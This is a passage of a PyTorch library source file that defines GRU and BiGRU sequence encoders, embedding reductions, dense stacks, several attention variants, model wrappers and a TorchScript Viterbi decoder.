        :return: The output sequence, `[T, B, H]` or `[B, T, H]` per `batch_first`
        """
        seq, seq_lengths = inputs
        packed_seq = torch.nn.utils.rnn.pack_padded_sequence(seq, seq_lengths.cpu(), batch_first=self.batch_first)
        packed_out, final_state = self.rnn(packed_seq)
        padded_out, _ = torch.nn.utils.rnn.pad_packed_sequence(packed_out, batch_first=self.batch_first)
        return padded_out
class GRUEncoderAll(GRUEncoderBase):
    """GRU encoder passing along the full output sequence and per-layer hidden states.

    Consumes a tuple of a sequence tensor shaped `[B, T, C]` (or `[T, B, C]` when
    `batch_first` is `False`) and a lengths vector `[B]`.  Produces the padded output
    sequence `[B, S, H]` with `S = max(lengths)` and the hidden state tensor `[L, B, H]`.
    """

    def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor]) -> Tuple[torch.Tensor, torch.Tensor]:
        """Encode a padded sequence and return outputs plus all layer hidden states.

        :param inputs: The sequence tensor and its lengths `[B]`
        :return: The padded output sequence and a hidden state tensor `[L, B, H]`
        """
        seq, seq_lengths = inputs
        packed_seq = torch.nn.utils.rnn.pack_padded_sequence(seq, seq_lengths.cpu(), batch_first=self.batch_first)
        packed_out, final_state = self.rnn(packed_seq)
        padded_out, _ = torch.nn.utils.rnn.pad_packed_sequence(packed_out, batch_first=self.batch_first)
        return padded_out, final_state
class GRUEncoderHidden(GRUEncoderBase):
    """GRU encoder that returns only the topmost hidden state.

    Consumes a tuple of a sequence tensor shaped `[B, T, C]` (or `[T, B, C]` when
    `batch_first` is `False`) and a lengths vector `[B]`, and produces a hidden state
    tensor of shape `[B, H]`.
    """

    def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor]) -> torch.Tensor:
        """Encode the sequence and extract the top layer's hidden state.

        :param inputs: The sequence tensor and its lengths `[B]`
        :return: A tensor of shape `[B, H]` holding the final RNN hidden state
        """
        seq, seq_lengths = inputs
        packed_seq = torch.nn.utils.rnn.pack_padded_sequence(seq, seq_lengths.cpu(), batch_first=self.batch_first)
        packed_out, final_state = self.rnn(packed_seq)
        padded_out, _ = torch.nn.utils.rnn.pad_packed_sequence(packed_out, batch_first=self.batch_first)
        return self.extract_top_state(final_state)
class BiGRUEncoderBase(nn.Module):
    """BiGRU encoder base for a set of encoders producing various outputs.

    All BiGRU encoders inheriting this class will trim the input to the max length given in the batch. For example,
    if the input sequence is `[B, T, C]` and the `S = max(lengths)` then the resulting sequence, if produced, will
    be length `S` (or more precisely, `[B, S, H]`). Because its bidirectional, half of the hidden units given in the
    constructor will be applied to the forward direction and half to the backward direction, and these will get
    concatenated.

    *PyTorch Note*: In PyTorch, its more common for the input shape to be temporal length first (`[T, B, H]`) and this
    is the PyTorch default. There is an extra parameter in all of these models called `batch_first` which controls this.
    Currently, the default is time first (`batch_first=False`), which differs from TensorFlow. To match the TF impl,
    set `batch_first=True`.

    *PyTorch Note*:
    Most `BiGRUEncoder` variants just define the `forward`. This module cannot provide the same utility as the
    TensorFlow `BiGRUEncoder` base right now, because because the JIT isnt handling subclassing of forward properly.
    """

    def __init__(
        self,
        insz: int,
        hsz: int,
        nlayers: int,
        pdrop: float = 0.0,
        requires_length: bool = True,
        batch_first: bool = False,
        unif: float = 0,
        initializer: str = None,
        **kwargs,
    ):
        """Produce a stack of GRUs with dropout performed on all but the last layer.

        :param insz: The size of the input
        :param hsz: The number of hidden units per BiGRU (`hsz//2` used for each direction and concatenated)
        :param nlayers: The number of layers of BiGRUs to stack
        :param pdrop: The probability of dropping a unit value during dropout, defaults to 0
        :param requires_length: Does this encoder require an input length in its inputs (defaults to `True`)
        :param batch_first: Should we do batch first input or time-first input? Defaults to `False` (differs from TF!)
        :param unif: PyTorch only! Initialization parameters for RNN
        :param initializer: PyTorch only! A string describing optional initialization type for RNN
        """
        super().__init__()
        self.requires_length = requires_length
        self.batch_first = batch_first
        self.nlayers = nlayers
        if nlayers == 1:
            # Inter-layer dropout is meaningless (and warns) for a single layer
            pdrop = 0.0
        self.rnn = torch.nn.GRU(insz, hsz // 2, nlayers, dropout=pdrop, bidirectional=True, batch_first=batch_first)
        # BUGFIX: use the in-place initializers (trailing underscore); the non-underscore
        # variants are deprecated/removed in modern PyTorch.  This also matches GRUEncoderBase.
        if initializer == "ortho":
            nn.init.orthogonal_(self.rnn.weight_hh_l0)
            nn.init.orthogonal_(self.rnn.weight_ih_l0)
        elif initializer == "he" or initializer == "kaiming":
            nn.init.kaiming_uniform_(self.rnn.weight_hh_l0)
            nn.init.kaiming_uniform_(self.rnn.weight_ih_l0)
        elif unif > 0:
            for weight in self.rnn.parameters():
                weight.data.uniform_(-unif, unif)
        else:
            nn.init.xavier_uniform_(self.rnn.weight_hh_l0)
            nn.init.xavier_uniform_(self.rnn.weight_ih_l0)
        self.output_dim = hsz

    def extract_top_state(self, state: torch.Tensor) -> torch.Tensor:
        # Select the topmost state with -1 and the only direction is forward (select with 0)
        return state[-1]
# TODO: normalize across backends or remove
class BiGRUEncoderSequenceHiddenContext(BiGRUEncoderBase):
    """BiGRU encoder returning both the output sequence and the top hidden state."""

    def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor]) -> Tuple[torch.Tensor, torch.Tensor]:
        """Encode a `(sequence, lengths)` pair, returning outputs and the top state.

        :param inputs: The sequence tensor and its lengths `[B]`
        :return: The padded output sequence and the top layer's direction-concatenated state
        """
        tbc, lengths = inputs
        packed = torch.nn.utils.rnn.pack_padded_sequence(tbc, lengths.cpu(), batch_first=self.batch_first)
        output, hidden = self.rnn(packed)
        output, _ = torch.nn.utils.rnn.pad_packed_sequence(output, batch_first=self.batch_first)
        return output, self.extract_top_state(_cat_dir(hidden))
class BiGRUEncoderAll(BiGRUEncoderBase):
    """BiGRU encoder passing along the full output and per-layer hidden states.

    Consumes a tuple of a sequence tensor shaped `[B, T, C]` (or `[T, B, C]` when
    `batch_first` is `False`) and a lengths vector `[B]`.  Produces the padded output
    sequence `[B, S, H]` with `S = max(lengths)` and the direction-concatenated hidden
    state `[L, B, H]`.
    """

    def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor]) -> Tuple[torch.Tensor, torch.Tensor]:
        """Encode a padded sequence and return outputs plus all layer hidden states.

        :param inputs: The sequence tensor and its lengths `[B]`
        :return: The padded output sequence and a hidden state tensor `[L, B, H]`
        """
        seq, seq_lengths = inputs
        packed_seq = torch.nn.utils.rnn.pack_padded_sequence(seq, seq_lengths.cpu(), batch_first=self.batch_first)
        packed_out, final_state = self.rnn(packed_seq)
        padded_out, _ = torch.nn.utils.rnn.pad_packed_sequence(packed_out, batch_first=self.batch_first)
        return padded_out, _cat_dir(final_state)
class BiGRUEncoderSequence(BiGRUEncoderBase):
    """BiGRU encoder producing only the transduced output sequence.

    Consumes a tuple of a sequence tensor shaped `[B, T, C]` (or `[T, B, C]` when
    `batch_first` is `False`) and a lengths vector `[B]`, and produces the padded output
    sequence `[B, S, H]` with `S = max(lengths)`, which may be shorter than `T`.
    """

    def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor]) -> torch.Tensor:
        """Encode a `(sequence, lengths)` pair into the last layer's output sequence.

        :param inputs: The sequence tensor and its lengths `[B]`
        :return: A tensor of shape `[B, S, H]` or `[S, B, H]` depending on `batch_first`
        """
        seq, seq_lengths = inputs
        packed_seq = torch.nn.utils.rnn.pack_padded_sequence(seq, seq_lengths.cpu(), batch_first=self.batch_first)
        packed_out, final_state = self.rnn(packed_seq)
        padded_out, _ = torch.nn.utils.rnn.pad_packed_sequence(packed_out, batch_first=self.batch_first)
        return padded_out
class BiGRUEncoderHidden(BiGRUEncoderBase):
    """BiGRU encoder that returns only the topmost hidden state.

    Consumes a tuple of a sequence tensor shaped `[B, T, C]` (or `[T, B, C]` when
    `batch_first` is `False`) and a lengths vector `[B]`, and produces a hidden state
    tensor of shape `[B, H]` with the two directions concatenated.
    """

    def forward(self, inputs):
        """Encode the sequence and extract the top layer's hidden state.

        :param inputs: The sequence tensor and its lengths `[B]`
        :return: A tensor of shape `[B, H]` holding the final RNN hidden state
        """
        seq, seq_lengths = inputs
        packed_seq = torch.nn.utils.rnn.pack_padded_sequence(seq, seq_lengths.cpu(), batch_first=self.batch_first)
        packed_out, final_state = self.rnn(packed_seq)
        padded_out, _ = torch.nn.utils.rnn.pad_packed_sequence(packed_out, batch_first=self.batch_first)
        return self.extract_top_state(_cat_dir(final_state))
class Reduction(nn.Module):
    """Abstract base for modules that combine a list of tensors into a single tensor.

    Subclasses override `forward` to perform the reduction and `set_output_dim` to
    compute `self.output_dim` from the per-input feature dims.
    """

    def __init__(self):
        super().__init__()

    def forward(self, inputs: List[torch.Tensor]) -> torch.Tensor:
        """Reduce a list of tensors to one tensor (abstract; returns nothing here)"""
        pass

    def set_output_dim(self, output_dims: List[int]):
        """Compute `self.output_dim` from the input dims (abstract; no-op here)"""
        pass
class ConcatReduction(Reduction):
    """Reduce a list of tensors by concatenating them along a configurable axis"""

    def __init__(self, output_dims: List[int], axis=-1, **kwargs):
        """
        :param output_dims: The feature dim of each input to be concatenated
        :param axis: The axis along which to concatenate (default last)
        """
        super().__init__()
        self.axis = axis
        self.set_output_dim(output_dims)

    def set_output_dim(self, output_dims: List[int]):
        """The concatenated dim is the sum of the individual input dims"""
        self.output_dim = sum(output_dims)

    def forward(self, inputs: List[torch.Tensor]) -> torch.Tensor:
        """Concatenate all inputs along `self.axis`"""
        return torch.cat(inputs, self.axis)
class ConcatSubtractReduction(Reduction):
    """Paired-input reduction concatenating both inputs and their absolute difference.

    This reduction assumes the inputs come in pairs and appends the elementwise distance
    `|a - b|` to the pair.  It is useful for training sentence encoders and is used, for
    example, in SentenceBERT.
    """

    def __init__(self, output_dims: List[int], axis=-1, **kwargs):
        """
        :param output_dims: The feature dim of each input (all assumed equal)
        :param axis: The axis along which to concatenate (default last)
        """
        super().__init__()
        self.axis = axis
        self.set_output_dim(output_dims)

    def set_output_dim(self, output_dims: List[int]):
        # Output is [a, b, |a - b|], i.e. 3x a single input's dim
        self.output_dim = 3 * output_dims[0]

    def forward(self, inputs: List[torch.Tensor]) -> torch.Tensor:
        """Concatenate the pair and its absolute difference along `self.axis`"""
        a, b = inputs[0], inputs[1]
        distance = torch.abs(a - b)
        return torch.cat([a, b, distance], self.axis)
class SumReduction(Reduction):
    """Reduce a list of same-shaped tensors by elementwise summation"""

    def __init__(self, output_dims: List[int], **kwargs):
        """:param output_dims: The feature dim of each input (all assumed equal)"""
        super().__init__()
        self.set_output_dim(output_dims)

    def set_output_dim(self, output_dims: List[int]):
        # We could actually project if we needed, or at least should validate
        self.output_dim = output_dims[0]

    def forward(self, inputs: List[torch.Tensor]) -> torch.Tensor:
        """Return the elementwise sum of all inputs"""
        total = inputs[0]
        for extra in inputs[1:]:
            total = total + extra
        return total
class SumLayerNormReduction(Reduction):
    """Sum a list of same-shaped tensors, then apply layer normalization"""

    def __init__(self, output_dims: List[int], layer_norm_eps: float = 1.0e-12, **kwargs):
        """
        :param output_dims: The feature dim of each input (all assumed equal)
        :param layer_norm_eps: Epsilon for the layer norm denominator
        """
        super().__init__()
        self.set_output_dim(output_dims)
        self.ln = nn.LayerNorm(self.output_dim, eps=layer_norm_eps)

    def set_output_dim(self, output_dims: List[int]):
        self.output_dim = output_dims[0]

    def forward(self, inputs: List[torch.Tensor]) -> torch.Tensor:
        """Sum the inputs elementwise and layer-normalize the result"""
        return self.ln(sum(inputs))
class EmbeddingsStack(nn.Module):
    """Stack of per-feature embeddings combined into a single word representation."""

    def __init__(
        self,
        embeddings_dict: Dict[str, nn.Embedding],
        dropout_rate: float = 0.0,
        requires_length: bool = False,
        reduction: Optional[Union[str, nn.Module]] = 'concat',
        **kwargs,
    ):
        """Takes in a dictionary where the keys are the input tensor names, and the values are the embeddings

        :param embeddings_dict: dictionary of each feature embedding
        :param dropout_rate: The dropout rate (0.0 means no dropout, 1.0 means complete)
        :param requires_length: Does this stack require an input length in its inputs (defaults to `False`)
        :param reduction: How to combine the features: a name ('concat', 'sum',
            'sum-layer-norm', 'concat-subtract') or a `Reduction` module instance
        """
        super().__init__()
        # Keys kept in a parallel list so forward can index them (annotation aids TorchScript)
        self._keys: List[str] = []
        embeddings_list = []
        output_dims = []
        for k, embedding in embeddings_dict.items():
            embeddings_list.append(embedding)
            self._keys.append(k)
            # get_dsz() is the embedding's feature dimension (project-specific API)
            output_dims += [embedding.get_dsz()]
        self.embeddings: nn.ModuleList = nn.ModuleList(embeddings_list)
        # TODO: should we make a registry of options?
        if isinstance(reduction, str):
            if reduction == 'sum':
                self.reduction = SumReduction(output_dims)
            elif reduction == 'sum-layer-norm':
                self.reduction = SumLayerNormReduction(output_dims, layer_norm_eps=kwargs.get('layer_norm_eps', 1.0e-12))
            elif reduction == 'concat-subtract':
                self.reduction = ConcatSubtractReduction(output_dims)
            else:
                # Any unrecognized string (including the default 'concat') falls back to concat
                self.reduction = ConcatReduction(output_dims)
        else:
            self.reduction = reduction
            self.reduction.set_output_dim(output_dims)
        self.dsz = self.reduction.output_dim
        self.dropout = nn.Dropout(dropout_rate)
        self.requires_length = requires_length

    def __getitem__(self, item: str) -> nn.Module:
        """Look up a single embedding module by its feature name.

        :param item: The feature key used at construction time
        :raises Exception: If the key is not present
        """
        idx = self._keys.index(item)
        if idx < 0:
            raise Exception(f"Invalid item ({item})")
        return self.embeddings[idx]

    def forward(self, inputs: Dict[str, torch.Tensor]) -> torch.Tensor:
        """This method performs "embedding" of the inputs. The base method here then concatenates along depth
        dimension to form word embeddings

        :return: A 3-d vector where the last dimension is the concatenated dimensions of all embeddings
        """
        all_embeddings_out = []
        # Manual index tracking instead of zip/enumerate — presumably for TorchScript
        # compatibility; confirm before restructuring
        i = 0
        for embedding in self.embeddings:
            k = self._keys[i]
            x = inputs[k]
            # Its a hair faster to do this than using isinstance
            if x.__class__ == tuple:
                embeddings_out = embedding(*x)
            else:
                embeddings_out = embedding(x)
            all_embeddings_out.append(embeddings_out)
            i += 1
        word_embeddings = self.reduction(all_embeddings_out)
        return self.dropout(word_embeddings)

    def keys(self):
        """Return the list of feature names in insertion order"""
        return self._keys

    @property
    def output_dim(self):
        # The reduced (combined) feature dimension
        return self.dsz

    def items(self):
        """Yield `(feature_name, embedding_module)` pairs"""
        for k, v in zip(self.keys(), self.embeddings):
            yield k, v
class DenseStack(nn.Module):
    """A stack of one or more hidden layers
    """

    def __init__(
        self,
        insz: int,
        hsz: Union[int, List[int]],
        activation: Union[str, List[str]] = "relu",
        pdrop_value: float = 0.5,
        init=None,
        skip_connect=False,
        layer_norm=False,
        **kwargs,
    ):
        """Stack 1 or more hidden layers, optionally (forming an MLP)

        :param insz: The number of input units
        :param hsz: The number of hidden units (a single int or one per layer)
        :param activation: The name of the activation function to use (or one per layer)
        :param pdrop_value: The dropout probability
        :param init: The initializer (currently unused)
        :param skip_connect: whether use skip connection when insz is equal to outsz for a layer
        :param layer_norm: whether use layer norm in each layer
        """
        super().__init__()
        hszs = listify(hsz)
        # BUGFIX: index the listified sizes; `hsz` itself may be a plain int
        # (which the type hint allows), and `int[-1]` raises a TypeError
        self.output_dim = hszs[-1]
        activations = listify(activation)
        if len(activations) == 1:
            activations = activations * len(hszs)
        if len(activations) != len(hszs):
            raise ValueError("Number of activations must match number of hidden sizes in a stack!")
        current = insz
        layer_stack = []
        if layer_norm:
            layer_norm_eps = kwargs.get('layer_norm_eps', 1e-6)
        # Renamed the loop variables so the `hsz` parameter is not shadowed
        for unit_sz, act_name in zip(hszs, activations):
            if skip_connect and current == unit_sz:
                # Same in/out size: residual connection is shape-compatible
                layer = SkipConnection(current, act_name)
            else:
                layer = Dense(current, unit_sz, act_name)
            if layer_norm:
                layer = nn.Sequential(layer, nn.LayerNorm(unit_sz, eps=layer_norm_eps))
            layer_stack.append(WithDropout(layer, pdrop_value))
            current = unit_sz
        self.layer_stack = nn.Sequential(*layer_stack)
        self.requires_length = False

    def forward(self, inputs: torch.Tensor) -> torch.Tensor:
        """Apply the stack of hidden layers to the input representation

        :param inputs: The fixed representation of the model
        :return: The output of the final layer
        """
        return self.layer_stack(inputs)
class VectorSequenceAttention(nn.Module):
    """Base class attending a single query vector over a sequence of keys/values.

    Subclasses implement `_attention` to produce the attention distribution;
    `_update` combines the attended context with the query via a learned projection.
    """

    def __init__(self, hsz: int):
        """:param hsz: The hidden size of the query, keys and values"""
        super().__init__()
        self.hsz = hsz
        # Projects the concatenated [context; query] (2H) back down to H
        self.W_c = nn.Linear(2 * self.hsz, hsz, bias=False)

    def forward(self, query_t, keys_bth, values_bth, keys_mask=None):
        # Output(t) = B x H x 1
        # Keys = B x T x H
        # a = B x T x 1
        a = self._attention(query_t, keys_bth, keys_mask)
        attended = self._update(a, query_t, values_bth)
        return attended

    def _attention(self, query_t, keys_bth, keys_mask):
        """Compute attention weights `[B, T]` (abstract; subclasses override)"""
        pass

    def _update(self, a, query_t, values_bth):
        # a = B x T
        # Want to apply over context, scaled by a
        # (B x 1 x T) (B x T x H) = (B x 1 x H)
        a = a.view(a.size(0), 1, a.size(1))
        c_t = torch.bmm(a, values_bth).squeeze(1)
        # Combine context with the query and squash through a tanh projection
        attended = torch.cat([c_t, query_t], -1)
        attended = torch.tanh(self.W_c(attended))
        return attended
def dot_product_attention_weights(query_t: torch.Tensor,
                                  keys_bth: torch.Tensor,
                                  keys_mask: torch.Tensor) -> torch.Tensor:
    """Compute softmax attention weights of a query vector over a keys sequence.

    :param query_t: A query vector `[B, H]`
    :param keys_bth: The keys `[B, T, H]`
    :param keys_mask: A mask `[B, T]` where entries equal to `MASK_FALSE` are masked out
    :return: Normalized attention weights `[B, T]`
    """
    scores = torch.bmm(keys_bth, query_t.unsqueeze(2)).squeeze(2)
    # Push masked positions to -inf-ish so they get ~0 probability after the softmax
    scores = scores.masked_fill(keys_mask == MASK_FALSE, -1e9)
    return F.softmax(scores, dim=-1)
def dot_product_attention_weights_lengths(query_t: torch.Tensor,
                                          keys_bth: torch.Tensor,
                                          keys_lengths: torch.Tensor) -> torch.Tensor:
    """Compute dot-product attention weights from key lengths instead of a mask.

    :param query_t: A query vector `[B, H]`
    :param keys_bth: The keys `[B, T, H]`
    :param keys_lengths: Valid key lengths `[B]`
    :return: Normalized attention weights `[B, T]`
    """
    keys_mask = sequence_mask(keys_lengths, keys_bth.shape[1]).to(keys_bth.device)
    return dot_product_attention_weights(query_t, keys_bth, keys_mask)
class LuongDotProductAttention(VectorSequenceAttention):
    """Luong "dot" attention: the score is the raw dot product of query and key."""

    def __init__(self, hsz):
        super().__init__(hsz)

    def _attention(self, query_t, keys_bth, keys_mask):
        # Delegate to the shared dot-product weight computation
        return dot_product_attention_weights(query_t, keys_bth, keys_mask)
class ScaledDotProductAttention(VectorSequenceAttention):
    """Dot-product attention with the score scaled by `1/sqrt(H)`"""

    def __init__(self, hsz):
        super().__init__(hsz)

    def _attention(self, query_t, keys_bth, keys_mask):
        """Compute scaled dot-product attention weights `[B, T]`"""
        scale = math.sqrt(self.hsz)
        scores = torch.bmm(keys_bth, query_t.unsqueeze(2)).squeeze(2) / scale
        # Mask out invalid positions before normalizing
        scores = scores.masked_fill(keys_mask == MASK_FALSE, -1e9)
        return F.softmax(scores, dim=-1)
class LuongGeneralAttention(VectorSequenceAttention):
    """Luong "general" attention: the query passes through a learned projection first"""

    def __init__(self, hsz):
        super().__init__(hsz)
        self.W_a = nn.Linear(self.hsz, self.hsz, bias=False)

    def _attention(self, query_t, keys_bth, keys_mask):
        """Compute projected dot-product attention weights `[B, T]`"""
        projected_query = self.W_a(query_t).unsqueeze(2)
        scores = torch.bmm(keys_bth, projected_query).squeeze(2)
        # Mask out invalid positions before normalizing
        scores = scores.masked_fill(keys_mask == MASK_FALSE, -1e9)
        return F.softmax(scores, dim=-1)
class BahdanauAttention(VectorSequenceAttention):
    """Bahdanau (additive / MLP) attention over a sequence of keys."""

    def __init__(self, hsz):
        """:param hsz: The hidden size used by the query/key projections"""
        super().__init__(hsz)
        self.hsz = hsz
        self.W_a = nn.Linear(self.hsz, self.hsz, bias=False)
        self.E_a = nn.Linear(self.hsz, self.hsz, bias=False)
        # Scores each tanh-combined position down to a scalar
        self.v = nn.Linear(self.hsz, 1, bias=False)

    def _attention(self, query_t, keys_bth, keys_mask):
        """Compute additive attention weights `v^T tanh(W q + E k)` per timestep"""
        B, T, H = keys_bth.shape
        q = self.W_a(query_t.view(-1, self.hsz)).view(B, 1, H)
        u = self.E_a(keys_bth).view(B, T, H)
        # q broadcasts over the T axis of u
        z = torch.tanh(q + u)
        a = self.v(z.view(-1, self.hsz)).view(B, T)
        a = a.masked_fill(keys_mask == MASK_FALSE, -1e9)
        a = F.softmax(a, dim=-1)
        return a

    def _update(self, a, query_t, values_bth):
        """Apply the weights to the values and linearly combine with the query.

        Unlike the base `_update`, there is no tanh after the projection.
        """
        query_t = query_t.view(-1, self.hsz)
        # a = B x T
        # Want to apply over context, scaled by a
        # (B x 1 x T) (B x T x H) = (B x 1 x H) -> (B x H)
        a = a.view(a.size(0), 1, a.size(1))
        c_t = (a @ values_bth).squeeze(1)
        # (B x 2H)
        attended = torch.cat([c_t, query_t], -1)
        attended = self.W_c(attended)
        return attended
class FineTuneModel(nn.Module):
    """Fine-tuning classifier: an embedding model, an optional stack, and a log-softmax projection"""

    def __init__(self, nc, embeddings, stack_model=None):
        """
        :param nc: The number of output classes
        :param embeddings: Either a dict of embeddings (wrapped in an `EmbeddingsStack`) or a module
        :param stack_model: An optional module applied on top of the embeddings
        """
        super().__init__()
        self.finetuned = EmbeddingsStack(embeddings) if isinstance(embeddings, dict) else embeddings
        self.stack_model = stack_model
        output_dim = stack_model.output_dim if stack_model is not None else self.finetuned.output_dim
        self.output_layer = Dense(output_dim, nc, activation="log_softmax")

    def forward(self, inputs):
        """Embed the input, optionally apply the stack, and project to log class scores"""
        hidden = self.finetuned(inputs)
        if self.stack_model is not None:
            hidden = self.stack_model(hidden)
        return self.output_layer(hidden)
class CompositePooling(nn.Module):
    """Run multiple pooling sub-modules in parallel and concatenate their outputs"""

    def __init__(self, models):
        """
        Note, this currently requires that each submodel is an eight_mile model with an `output_dim` attr
        """
        super().__init__()
        self.models = nn.ModuleList(models)
        # The concatenated width is the sum of the submodel widths
        self.output_dim = sum(m.output_dim for m in self.models)
        # If any submodel needs lengths, this composite does too
        self.requires_length = any(getattr(m, "requires_length", False) for m in self.models)

    def forward(self, inputs):
        """Pool with every submodel and concatenate along the last axis"""
        tensor, lengths = tensor_and_lengths(inputs)
        pooled = []
        for sub_model in self.models:
            needs_length = getattr(sub_model, "requires_length", False)
            sub_input = (tensor, lengths) if needs_length else tensor
            pooled.append(sub_model(sub_input))
        return torch.cat(pooled, -1)
class EmbedPoolStackModel(nn.Module):
    """Multi-phase classification idiom: embed, pool, stack, project.

    The input tensors are embedded, pooled to a fixed-width representation, passed
    through optional hidden "stacking" layers, and finally projected to the output space.
    """

    def __init__(
        self,
        nc: int,
        embeddings: nn.Module,
        pool_model: nn.Module,
        stack_model: Optional[nn.Module] = None,
        output_model: Optional[nn.Module] = None,
    ):
        """
        :param nc: The number of output classes
        :param embeddings: The embedding module
        :param pool_model: Pools `(embedded, lengths)` to a fixed-width vector
        :param stack_model: Optional hidden layers applied after pooling
        :param output_model: Optional custom output head (defaults to a log-softmax Dense)
        """
        super().__init__()
        self.embed_model = embeddings
        self.pool_model = pool_model
        self.stack_model = stack_model if stack_model else nn.Identity()
        output_dim = stack_model.output_dim if stack_model is not None else self.pool_model.output_dim
        self.output_layer = output_model if output_model is not None else Dense(output_dim, nc, activation="log_softmax")

    def forward(self, inputs: Dict[str, torch.Tensor]):
        """Embed the input dict, pool with lengths, apply the stack, and project"""
        lengths = inputs["lengths"]
        pooled = self.pool_model((self.embed_model(inputs), lengths))
        return self.output_layer(self.stack_model(pooled))
class PassThru(nn.Module):
    """Identity layer that records its input dimension as `output_dim`"""

    def __init__(self, input_dim):
        """:param input_dim: The feature dimension, passed through unchanged"""
        super().__init__()
        self.output_dim = input_dim

    def forward(self, inputs: torch.Tensor) -> torch.Tensor:
        """Return the input unchanged"""
        return inputs
class WithoutLength(nn.Module):
    """Wrapper that drops the lengths component from a `(tensor, lengths)` input pair"""

    def __init__(self, layer: nn.Module):
        """:param layer: The wrapped layer, called with only the tensor"""
        super().__init__()
        self.layer = layer
        # Propagate the wrapped layer's output dim when it advertises one
        self.output_dim = self.layer.output_dim if hasattr(self.layer, "output_dim") else 0

    def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor]) -> torch.Tensor:
        """Call the wrapped layer on the tensor only, ignoring the lengths"""
        tensor = inputs[0]
        return self.layer(tensor)
class WithDropout(nn.Module):
    """Wrapper for any layer that surrounds it with dropout"""

    def __init__(self, layer: nn.Module, pdrop: float = 0.5, variational=False, batch_first=False):
        """Create a dropout wrapper around the given layer

        :param layer: Some sort of layer
        :param pdrop: A dropout value
        :param variational: If `True`, use variational (locked) dropout instead of standard dropout
        :param batch_first: Orientation flag forwarded to the variational dropout
        """
        super().__init__()
        self.layer = layer
        if variational:
            self.dropout = VariationalDropout(pdrop, batch_first=batch_first)
        else:
            self.dropout = nn.Dropout(pdrop)
        # Propagate the wrapped layer's output dim when it advertises one
        self.output_dim = self.layer.output_dim if hasattr(self.layer, "output_dim") else 0

    def forward(self, inputs: torch.Tensor) -> torch.Tensor:
        """Apply the wrapped layer, then dropout

        :param inputs: input tensor
        :return: output transformed by the held layer and subsequent dropout
        """
        transformed = self.layer(inputs)
        return self.dropout(transformed)
class WithDropoutOnFirst(nn.Module):
    """Wrapper for any layer that surrounds it with dropout

    This exists primarily for the LSTMEncoderWithState to allow dropout on the output while
    passing back the hidden state
    """

    def __init__(self, layer: nn.Module, pdrop: float = 0.5, variational=False):
        """Create a dropout wrapper around the given layer

        :param layer: Some sort of layer whose forward returns a 2-tuple
        :param pdrop: A dropout value
        :param variational: If `True`, use variational (locked) dropout instead of standard dropout
        """
        super().__init__()
        self.layer = layer
        self.dropout = VariationalDropout(pdrop) if variational else nn.Dropout(pdrop)
        # Propagate the wrapped layer's output dim when it advertises one
        self.output_dim = self.layer.output_dim if hasattr(self.layer, "output_dim") else 0

    # BUGFIX: the return annotation said `torch.Tensor` but the method returns a 2-tuple
    def forward(self, inputs: Tuple[torch.Tensor]) -> Tuple[torch.Tensor, torch.Tensor]:
        """Apply the layer, then dropout on the first output only

        :param inputs: input tensor(s)
        :return: A tuple of (dropped-out first output, second output passed through unchanged)
        """
        outputs = self.layer(inputs)
        return self.dropout(outputs[0]), outputs[1]
def transition_mask(vocab, span_type, s_idx, e_idx, pad_idx=None):
    """Create a mask to enforce span sequence transition constraints.

    Returns a Tensor with valid transitions as a 0 and invalid as a 1 for easy use with `masked_fill`

    :param vocab: The label vocabulary
    :param span_type: The span labeling scheme passed through to `transition_mask_np`
    :param s_idx: The index of the start (GO) tag
    :param e_idx: The index of the end (EOS) tag
    :param pad_idx: The optional index of the PAD tag
    """
    np_mask = transition_mask_np(vocab, span_type, s_idx, e_idx, pad_idx=pad_idx)
    # NOTE(review): the `== 0` comparison inverts the numpy mask (entries equal to 0
    # become True) — confirm the intended polarity against transition_mask_np
    return torch.from_numpy(np_mask) == 0
@torch.jit.script
def inplace_assign(data: torch.Tensor, index: torch.Tensor, new_data: torch.Tensor) -> torch.Tensor:
    """Write `new_data` into row `index` of `data` in place (TorchScript-compatible).

    :param data: The destination tensor, mutated by `scatter_`
    :param index: A single row index into dim 0 of `data`
    :param new_data: The row values to write
    :return: `data` (the same tensor, after mutation)
    """
    # scatter_ needs the index expanded to match the shape of the row being written
    new_data = new_data.unsqueeze(0)
    index = index.expand(1, new_data.size(1))
    data.scatter_(0, index, new_data)
    return data
@torch.jit.script
def i2t(i: int) -> torch.Tensor:
    """Lift a Python int into a 1-element long tensor (TorchScript helper)"""
    return torch.tensor([i])
@torch.jit.script
def script_viterbi(
    unary: torch.Tensor, trans: torch.Tensor, start_idx: int, end_idx: int
) -> Tuple[torch.Tensor, torch.Tensor]:
    """Viterbi decode for a single sequence (TorchScript-compatible).

    :param unary: Unary (emission) scores `[T, N]`
    :param trans: Transition scores `[N, N]`
    :param start_idx: The index of the start (GO) tag
    :param end_idx: The index of the end (EOS) tag
    :return: The best tag path `[T]` and its score
    """
    seq_len: int = unary.size(0)
    num_tags: int = unary.size(1)
    fill_value: float = -1e4
    # dtype=unary.dtype fails, with prim_dtype error on torch 1.7.1
    alphas = torch.full((num_tags,), fill_value, dtype=torch.float, device=unary.device)
    # Zero out the start tag so all paths begin there
    broadcast_idx = torch.full((num_tags,), start_idx, dtype=torch.long)
    alphas = alphas.scatter(0, broadcast_idx, torch.zeros((num_tags,)))
    alphas = alphas.unsqueeze(0)
    # Backpointers accumulate one row per timestep (row 0 is a dummy)
    backpointers: torch.Tensor = torch.zeros(num_tags, dtype=torch.long).unsqueeze(0)
    for i in range(seq_len):
        unary_t = unary[i, :]
        next_tag_var = alphas + trans
        # Best previous tag for each current tag
        viterbi, best_tag_ids = torch.max(next_tag_var, 1)
        backpointers = torch.cat([backpointers, best_tag_ids.unsqueeze(0)], 0)
        alphas = (viterbi + unary_t).unsqueeze(0)
    # Transition into the end tag closes the path
    terminal_vars = alphas.squeeze(0) + trans[end_idx, :]
    path_score, best_tag_id = torch.max(terminal_vars, 0)
    best_path = best_tag_id.unsqueeze(0)
    # Walk the backpointers from the last timestep to the first
    for i in range(unary.size(0)):
        t = seq_len - i - 1
        best_tag_id = backpointers[t + 1, best_tag_id]
        best_path = torch.cat([best_path, best_tag_id.unsqueeze(0)], -1)
    # Reverse to chronological order; drop the extra start entry
    new_path_vec = best_path.flip(0)
    return new_path_vec[1:], path_score
class ViterbiBatchSize1(nn.Module):
